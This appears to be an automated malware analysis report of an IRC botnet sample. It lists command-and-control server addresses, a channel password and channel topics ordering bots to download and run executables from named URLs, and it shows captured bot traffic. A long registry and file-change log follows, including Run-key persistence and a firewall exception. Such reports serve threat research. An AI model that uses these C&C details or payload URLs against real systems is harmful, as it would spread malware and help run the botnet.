nice.niceshot.in 67.202.108.14
C&C Server: 67.202.108.14:6567 
 Server Password: 
 Username: XP-5109 
 Nickname: [SI|DEU|00|P|07356] 
 Channel: #update# (Password: c1rc0dus0leil) 
 Channeltopic: :.updbin http://www.ahava.lt/ali.exe
Username: XP-1820 
 Nickname: [SI|DEU|00|P|47468] 
 Channel: #cricri# (Password: c1rc0dus0leil) 
 Channeltopic:
nice.niceshot.in 67.202.108.130
C&C Server: 67.202.108.130:6567 
 Server Password: 
 Username: XP-3473 
 Nickname: [SI|DEU|00|P|06553] 
 Channel: #csm# (Password: c1rc0dus0leil) 
 Channeltopic: :.austinupdate http://www.minka.com.pe/wp-includes/js/crap.exe
MODE [SI|USA|00|P|82252] -ix
 JOIN #perurlz# c1rc0dus0leil
 PRIVMSG #perurlz# :[Dl]: File download: 84.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_20070.exe @ 84.0KB/sec.
 QUIT [Update]: Updating to new bin.
 NICK [SI|USA|00|P|82252]
 USER XP-0038 * 0 :COMPUTERNAME
 NICK [SI|USA|00|P|35266]
 USER XP-6943 * 0 :COMPUTERNAME
 MODE [SI|USA|00|P|35266] -ix
 JOIN #csm# c1rc0dus0leil
 PRIVMSG #csm# :[p2p]: File injected to peer2peer folders.
 nice.niceshot.in  67.202.108.130 
 nice.niceshot.in  67.202.108.14
C&C Server: 67.202.108.130:6567 
 Server Password: 
 Username: XP-7539 
 Nickname: [SI|DEU|00|P|86123] 
 Channel: #all# (Password: c1rc0dus0leil) 
 Channeltopic: :- 
 C&C Server: 67.202.108.14:6567 
 Server Password: 
 Username: XP-8566 
 Nickname: [SI|DEU|00|P|00732] 
 Channel: #all# (Password: c1rc0dus0leil) 
 Channeltopic: :-
 Registry Changes by all processes 
 Create or Open 
 Changes  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Ci Servs" = newbin.exe
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "Ci Servs" = newbin.exe
 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "c:\dedicacion.exe" = c:\dedicacion.exe:*:Enabled:Ci Servs
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “ControlFlags” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “BitNames” = Error Unusual Info Debug
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “Active” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “ControlFlags” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “BitNames” = Error Unusual Info Debug
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “Active” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “ControlFlags” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “Guid” = 8aefce96-4618-42ff-a057-3536aa78233e
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “BitNames” = Error Unusual Info Debug
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetsh “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetsh “Active” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetsh “ControlFlags” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetshNapmontr “Guid” = 710adbf0-ce88-40b4-a50d-231ada6593f0
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetshNapmontr “BitNames” = NAP_TRACE_BASE NAP_TRACE_NETSH
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagent “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagent “Active” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagent “ControlFlags” = [REG_DWORD, value: 00000001]
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagenttraceIdentifier “Guid” = b0278a28-76f1-4e15-b1df-14b209a12613
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagenttraceIdentifier “BitNames” = Error Unusual Info Debug
 Reads  HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
 HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
 HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
 HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “InstallRoot”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “CLRLoadLogDir”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “OnlyUseLatestCLR”
 HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Counter”
 HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Help”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “EventLogLevel”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “TotalInstanceName”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “DisplayHeapPerfObject”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ProcessNameFormat”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ThreadNameFormat”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Counter”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Help”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Counter”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Help”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf1”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf2”
 HKEY_PERFORMANCE_DATA “230 784”
 HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “CurrentBuildNumber”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging Directory”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Log File Max Size”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
 HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
 HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Repository Directory”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentLocalConfig “Enable Tracing”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentLocalConfig “Tracing Level”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Friendly Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Description”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Enabled”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Vendor Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Info Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Config Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Validator Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Registration Date”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Component Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Friendly Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Description”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Enabled”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Vendor Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Info Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Config Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Validator Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Registration Date”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Component Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Friendly Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Description”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Enabled”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Vendor Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Info Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Config Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Validator Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Registration Date”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Component Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Friendly Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Description”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Enabled”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Vendor Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Info Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Config Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Validator Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Registration Date”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Component Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Friendly Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Description”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Enabled”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Vendor Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Info Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Config Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Validator Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Registration Date”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Component Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Friendly Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Description”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Enabled”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Vendor Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Info Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Config Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Validator Clsid”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Registration Date”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Component Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentLocalConfig “PlumbIpsecPolicy”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “ProcessID”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “EnablePrivateObjectHeap”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “ContextLimit”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “ObjectLimit”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “IdentifierLimit”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "newbin.exe"
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
 HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
 HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
 HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “InstallRoot”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “CLRLoadLogDir”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “OnlyUseLatestCLR”
 HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Counter”
 HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Help”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “EventLogLevel”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “TotalInstanceName”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “DisplayHeapPerfObject”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ProcessNameFormat”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ThreadNameFormat”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Counter”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Help”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Counter”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Help”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf1”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf2”
 HKEY_PERFORMANCE_DATA “230 784”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Sink Transmit Buffer Size”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “DefaultRpcStackSize”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “EnableObjectValidation”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Log File Max Size”
 HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C}InprocServer32 “ThreadingModel”
 HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C}InprocServer32 “Synchronization”
 HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C}InprocServer32 “”
 HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C} “”
 HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C} “AppId”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionHotFixKB956572 “Installed”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOMSecuredHostProviders “ROOTCIMV2:__Win32Provider.Name=”CIMWin32″”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging Directory”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “ProductName”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlProductOptions “ProductSuite”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “ProductId”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “RegisteredOwner”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “RegisteredOrganization”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “Plus! ProductId”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “CurrentType”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “InstallDate”
 HKEY_LOCAL_MACHINESYSTEMSetup “SystemPartition”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlPriorityControl “Win32PrioritySeparation”
 HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSession ManagerMemory Management “LargeSystemCache”
 HKEY_LOCAL_MACHINEHARDWAREDESCRIPTIONSystemCentralProcessor  “ProcessorNameString”
 HKEY_LOCAL_MACHINEHARDWAREDESCRIPTIONSystemCentralProcessor  “Identifier”
 “Counter”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “EventLogLevel”
 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “TotalInstanceName”
 HKEY_PERFORMANCE_DATA “238”
 Enums  HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicyAppPatch
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicy
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicyAppPatch
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicy
 File Changes by all processes 
 New Files  c:\dedicacion.exe
 DeviceTcp
 DeviceIp
 DeviceIp
 DeviceGpc
 DeviceTcp6
 C:\WINDOWS\newbin.exe
 C:\WINDOWS\newbin.exe
 DeviceTcp
 DeviceIp
 DeviceIp
 DeviceGpc
 DeviceTcp6
 DeviceRasAcd
 Opened Files  .Ip
 c:dedicacion.exe.config
 c:dedicacion.exe
 .PIPEEVENTLOG
 .PIPEROUTER
 C:WINDOWSAppPatchsysmain.sdb
 C:WINDOWSAppPatchsystest.sdb
 DeviceNamedPipeShimViewer
 C:WINDOWSsystem32
 C:WINDOWS
 C:WINDOWSRegistrationR000000000007.clb
 .PIPElsarpc
